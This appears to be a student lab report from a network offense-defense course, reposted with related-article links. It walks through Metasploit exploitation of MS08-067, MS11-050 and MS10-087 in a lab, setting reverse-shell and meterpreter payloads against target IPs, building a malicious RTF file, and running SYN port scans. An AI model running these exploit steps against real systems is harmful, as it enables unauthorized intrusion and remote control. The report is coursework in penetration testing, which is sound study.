20145234黄斐《网络对抗技术》实验五,MSF基础应用
MSF的六种模块
- 渗透攻击模块(Exploit Modules)渗透攻击是指由攻击者或渗透测试者利用一个系统、应用或服务中的==安全漏洞==,所进行的攻击行为。
- 辅助模块(Auxiliary Modules) 能够帮助渗透测试者在进行渗透攻击之前得到目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
- 攻击载荷(Payload Modules)原意指‘载荷’,就是被运输的东西。
- 空字段模块(Nop Modules)是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,最典型的空指令就是空操作。
- 编码模块(Encoders)编码:攻击载荷模块与空指令模块组装完成一个指令序列后进行。
- 后渗透攻击模块(Post)
MS08-067漏洞攻击
- 启用msf终端:
msfconsole - 可以通过:
search ms08_067,查找相应的漏洞 - 找到后,会显示相应漏洞的模块,如下图所示
- 等待时间可能会比较长


- msfconsole有一个好处,就是每一步的操作都可以提示你后续的步骤,即便不知道指令也可以通过
help来查找 - 根据上述漏洞的模块,我们可以选择相应的模块
use exploit/windows/smb/ms08_067_netapi
- 接下来可以查看相应的攻击载荷,首先我们可以查看可使用的载荷
show payloads
- 因为我们想要获取靶机的shell,所以可以选择以上2种攻击载荷
- 如:
set payload generic/shell_reverse_tcp
- 如:
- 注意:此处的目的是获取shell,如果想用
meterpreter,找到相应的payload并设置即可
- 查看配置渗透攻击所需的配置项
show options
通过上述操作,可以让我们知道有哪些参数需要进行配置
set LHOST 10.43.57 //设置攻击IP
set RHOST 10.43.48.75 //设置靶机IP
- 接下来可以看看有哪些合适的靶机平台
show targets
- 设置相应平台的编号:
set target 0 - 此处不设置也可以,msf平台可以自动帮你从第一个开始搜索满足要求的靶机平台
- 发起渗透攻击
exploit
- 获取shell如下图所示
- 攻击失败
- 删除靶机的相应补丁

- 还是失败
问题思考
- 第一次失败原因:攻击时一直提示,会话不能建立,查询后发现靶机的漏洞已经被补了
- 第二次失败原因:这个就不清楚了,
MS11050浏览器漏洞攻击
- 终端中打开
msfconsole,输入命令use windows/browser/ms11_050_mshtml_cobjectelement,使用MS11050漏洞模块; 
- 使用命令
set payload windows/meterpreter/reverse_tcp指定攻击有效载荷; 
- 设置具体参数:
set LHOST Kali的IP、set LPORT 自定义端口号和set URIPATH 自定义域名; 
show options查看所有参数是否设置正确,最后下令发起攻击exploit
- 在靶机上使用IE浏览器访问192.168.199.143:8080/hfhf

攻击成功

MS10-087漏洞攻击
- 选取module:
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
- 设置合适的payload:
set payload windows/exec- 注:此处是运行一个可执行文件
set FILENAME 20145234.rft //设置生成文件rtf
set CMD notepad.exe //绑定记事本执行
- 发起渗透攻击
exploit

- 将生成的文件从
/root/.msf4/local/20145234.rft拷贝到靶机上,并把格式修改为.doc - 双击运行,结果被成功绑定到记事本程序
辅助模块
- 进入
msfconsle后,通过下面相关指令查找辅助模块show auxiliary
ack:通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测;
ftpbounce:通过FTP BOUNCE攻击的原理对TCP服务进行枚举
syn:使用发送TCP SYN标志的方式探测开放的端口
tcp:通过一次完整的TCP链接来判断端口是否开放
xmas:一种更为隐蔽的扫描方式,通过发送FIN,PSH,URG标志能够躲避一些TCP标记检测器的过滤
- 选取相应的moudle,在这里选择如下:
use auxiliary/scanner/portscan/syn
设置好相应参数,可以通过
show options来查看set RHOSTS 192.168.199.139 //设置扫描目标IP地址
set THREADS 50 //设置线程数

- 启动:
run,扫描结果如下: 
- 此时,我们也可以在
msf下用nmap的相关指令,对目标主机进行扫描:
通过观察不难发现,扫描速度更快,并且对每种端口的作用也有了个说明,能弄清楚每个端口是干嘛的
- aux模块虽然不像exploit那样直接对靶机进行攻击,但它是排头兵,是对成功实现攻击的很好保障,比如在CTF竞赛中,我们为了查看靶机的web服务,首先就要对开放端口进行扫描,确认哪个端口是挂了web的,然后才有后面的后台扫描、拖库、旁注、提权等操作
- 所以辅助模块在整个六大模块中的地位也是举足轻重的
20145234黄斐《网络对抗技术》实验五,MSF基础应用的更多相关文章
- 20155201 网络攻防技术 实验五 MSF基础应用
20155201 网络攻防技术 实验五 MSF基础应用 一.实践内容 一个主动攻击实践,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adobe 成功应用任何一 ...
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...
- 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...
- 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...
- 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...
- 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8
<网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...
- 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...
- 20165308『网络对抗技术』Exp5 MSF基础应用
20165308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...
- 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...
随机推荐
- 用ABAP代码读取S/4HANA生产订单工序明细
在S/4HANA事务码CO03显示的Production Order里,我希望用ABAP代码显示出该订单的operation(工序)ID,描述和状态Status,如下图所示: 很简单的几行ABAP代码 ...
- Oracle的四种连接方式【转载】
我们以Oracle自带的表来做例子 主要两张表:dept.emp 一个是部门,一个是员工表结构如下: emp name null? Type Empno not null number(4) enam ...
- Linux服务器磁盘空间占满问题
下面我们一起来看一篇关于Linux服务器磁盘占满问题解决(/dev/sda3 满了),希望碰到此类问题的人能带来帮助. 今天下班某电商技术部leader发现个问题,说他们服务器硬盘满了.把日志文件 ...
- oracle imp 报12154错误解决办法
imp test/test@orcl file=/backup.dmp full=y --报错 imp test/test@127.0.0.1/orcl file=/backup.dmp full ...
- 简单理解Socket 重要
http://www.cnblogs.com/dolphinX/p/3460545.html 题外话 前几天和朋友聊天,朋友问我怎么最近不写博客了,一个是因为最近在忙着公司使用的一些控件的开发,浏览器 ...
- Hive分区表创建,增加及删除
1.创建Hive分区表,按字段分区 CREATE TABLE test1 ( id bigint , create_time timestamp , user_id string) partition ...
- tar 打包带软连接的文件
打包普通文件夹,压缩带参数z,创建tar.gz tar -cvf ./tmp/SK_Aug_camera.tar ./gap_40_5 但是文件夹里含有软连接,带参数 h tar -cvhf ./tm ...
- yii2.0 rules 规则中场景验证字段
除了app场景以外的其他场景都验证uid字段['uid', 'required','except'=>'app', 'message' => '参数错误'], 只有app场景验证uid字段 ...
- $_cookie的使用
设置并发送 cookie: <?php $value = "my cookie value"; // 发送一个简单的 cookie setcookie("TestC ...
- js如何将一个json数组对应放置到另一数组中去
需要将上面这个数组的每一个元素对应添加至下面的数组中 最后合成为这样的数组: 使用for循环,将第一个数组中的元素循环到第二个数组中
